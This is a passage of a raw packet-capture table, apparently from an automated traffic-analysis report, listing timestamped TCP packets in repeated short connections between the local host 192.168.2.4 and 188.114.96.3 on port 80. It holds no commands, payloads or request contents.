                  Sep 25, 2024 15:29:21.687272072 CEST5592480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.691492081 CEST8055924188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:21.858822107 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.868463039 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:21.868571997 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.871562958 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.877248049 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:21.877332926 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:21.883229971 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.673975945 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.674103975 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.674951077 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.675004005 CEST5592580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.680604935 CEST8055925188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.952887058 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.957988024 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.958095074 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.961080074 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.966309071 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:22.966391087 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:22.972016096 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.753916025 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.754090071 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.754235983 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.754285097 CEST5592680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.758949041 CEST8055926188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.916517973 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.921403885 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.921478987 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.923665047 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.928447008 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:23.928498030 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:23.933298111 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.755846024 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.756017923 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.756756067 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.756819963 CEST5592780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.760804892 CEST8055927188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.907974958 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.914019108 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.914108038 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.916723967 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.921525002 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:24.921644926 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:24.928392887 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:26.878097057 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:26.878402948 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:26.879067898 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:26.879133940 CEST5592880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:26.883420944 CEST8055928188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.042970896 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.048403025 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.048496962 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.050617933 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.055624008 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.055675030 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.060877085 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.707496881 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.707906008 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.710721970 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.710783005 CEST5592980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.715578079 CEST8055929188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.856446981 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.861912012 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.861988068 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.864459991 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.870177031 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:27.870220900 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:27.875838041 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.622564077 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.623064041 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.623111010 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.625323057 CEST5593180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.631310940 CEST8055931188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.929188013 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.934226990 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.934324980 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.937855959 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.942717075 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:28.942773104 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:28.947808027 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.615843058 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.616024017 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.617259026 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.617316008 CEST5593280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.620789051 CEST8055932188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.764981985 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.769980907 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.770091057 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.772151947 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.777162075 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:29.777252913 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:29.782213926 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.430428028 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.431019068 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.431091070 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.431145906 CEST5593380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.436181068 CEST8055933188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.573311090 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.578171015 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.579696894 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.582592964 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.587399960 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:30.591674089 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:30.596493959 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.557198048 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.557224989 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.557239056 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.557337046 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.557367086 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.559910059 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.560025930 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.573163033 CEST5593480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.579554081 CEST8055934188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.886042118 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.892743111 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.892834902 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.899652958 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.906691074 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:31.906769991 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:31.911701918 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.623945951 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.624051094 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.624977112 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.625014067 CEST5593580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.628953934 CEST8055935188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.783730984 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.789900064 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.790004969 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.792078972 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.797863007 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:32.797954082 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:32.802978992 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.508528948 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.508697033 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.510838985 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.510885954 CEST5593680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.513536930 CEST8055936188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.651272058 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.656261921 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.656362057 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.658562899 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.663680077 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:33.663752079 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:33.668576956 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.368746996 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.368849039 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.368968010 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.369008064 CEST5593780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.373954058 CEST8055937188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.507328033 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.512249947 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.512365103 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.514517069 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.519718885 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:34.519787073 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:34.524560928 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.193804026 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.193902969 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.193986893 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.194082975 CEST5593880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.198669910 CEST8055938188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.338762999 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.345367908 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.345488071 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.347440004 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.353374958 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:35.353458881 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:35.359232903 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.042773962 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.042891026 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.044084072 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.044131994 CEST5593980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.047854900 CEST8055939188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.180238008 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.185200930 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.185319901 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.187341928 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.192259073 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.192349911 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.197191000 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.930238008 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.930413961 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.930635929 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:36.930712938 CEST5594080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:36.935468912 CEST8055940188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.104393959 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.110629082 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.110716105 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.112823009 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.117765903 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.117851973 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.122632980 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.927221060 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.927517891 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.928500891 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:37.929507971 CEST5594180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:37.932327986 CEST8055941188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.085711956 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.090723038 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.091711044 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.093724966 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.099848032 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.099927902 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.105036020 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.890101910 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.890389919 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.890539885 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:38.890602112 CEST5594280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:38.895251036 CEST8055942188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.046932936 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.052088976 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.052176952 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.054641008 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.059679985 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.059740067 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.064547062 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.760343075 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.761117935 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.761199951 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.767534018 CEST5594380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.772495985 CEST8055943188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.914601088 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.921063900 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.921181917 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.923233032 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.928728104 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:39.928783894 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:39.933774948 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.653837919 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.653978109 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.654933929 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.654988050 CEST5594480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.659575939 CEST8055944188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.795840025 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.800787926 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.800901890 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.803019047 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.808089018 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:40.808146954 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:40.812988997 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.471640110 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.471798897 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.471815109 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.471862078 CEST5594580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.476685047 CEST8055945188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.625467062 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.630584955 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.630681038 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.633367062 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.638175011 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:41.638242960 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:41.643100977 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.305742025 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.305949926 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.306814909 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.306864023 CEST5594680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.310743093 CEST8055946188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.462697029 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.467762947 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.467866898 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.470592976 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.475404978 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:42.475610971 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:42.480464935 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.162539959 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.162637949 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.163499117 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.163547993 CEST5594780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.167479038 CEST8055947188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.312001944 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.317142963 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.317233086 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.320044994 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.324860096 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:43.324953079 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:43.329879999 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.096743107 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.097009897 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.097543955 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.097624063 CEST5594880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.101969004 CEST8055948188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.251260996 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.256354094 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.256485939 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.258714914 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.263523102 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:44.263622046 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:44.268486023 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.056214094 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.056343079 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.057349920 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.057395935 CEST5594980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.061184883 CEST8055949188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.196466923 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.367119074 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.367235899 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.369345903 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.374125004 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:45.374185085 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:45.378964901 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.147882938 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.147974968 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.148418903 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.148457050 CEST5595080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.152919054 CEST8055950188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.294290066 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.299235106 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.299324036 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.301419020 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.306281090 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:46.306365013 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:46.311172962 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.186216116 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.186446905 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.186606884 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.186664104 CEST5595180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.191360950 CEST8055951188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.347495079 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.353176117 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.353260040 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.355966091 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.360757113 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:47.360806942 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:47.366703987 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.239687920 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.240063906 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.240637064 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.240708113 CEST5595280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.244918108 CEST8055952188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.402642965 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.407618999 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.407773972 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.409802914 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.414733887 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:48.414802074 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:48.419686079 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.512233019 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.512820005 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.512909889 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:49.514672041 CEST5595380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:49.520363092 CEST8055953188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.665340900 CEST5595480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:49.670264006 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.670411110 CEST5595480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:49.672507048 CEST5595480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:29:49.677318096 CEST8055954188.114.96.3192.168.2.4
                  Sep 25, 2024 15:29:49.677411079 CEST5595480192.168.2.4188.114.96.3
